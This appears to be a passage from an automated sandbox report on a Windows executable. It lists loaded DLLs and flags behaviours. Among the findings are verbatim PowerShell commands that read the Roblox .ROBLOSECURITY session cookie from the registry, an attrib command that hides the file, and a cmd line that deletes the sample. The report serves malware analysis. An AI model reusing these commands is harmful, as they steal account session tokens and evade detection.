Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: WE8zqotCFj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: WE8zqotCFj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: WE8zqotCFj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER	Jump to behavior

Source: WE8zqotCFj.exe

Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF00BD pushad ; iretd	0_2_00007FF887CF00C1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D0583D pushfd ; retf	0_2_00007FF887D05991
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D06375 push eax; retf	0_2_00007FF887D359DD
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFDA43 pushad ; iretd	0_2_00007FF887CFDAB1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D08220 push ebx; retn 5F4Ch	0_2_00007FF887D0826A
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D0793D push ebx; retf	0_2_00007FF887D0796A
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC8BD4 pushad ; retf	0_2_00007FF887EC8BE9
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC36C9 pushad ; ret	0_2_00007FF887EC36D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF887BCD2A5 pushad ; iretd	4_2_00007FF887BCD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF887DB2316 push 8B485F94h; iretd	4_2_00007FF887DB231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF887D108BD push E9592A1Ch; ret	7_2_00007FF887D10909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF887D1233E push eax; iretd	7_2_00007FF887D1233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF887D12310 push eax; iretd	7_2_00007FF887D1233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF887CF6387 push esp; retf	9_2_00007FF887CF6388

Persistence and Installation Behavior

Uses attrib.exe to hide files

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\WE8zqotCFj.exe"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause			Jump to behavior

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
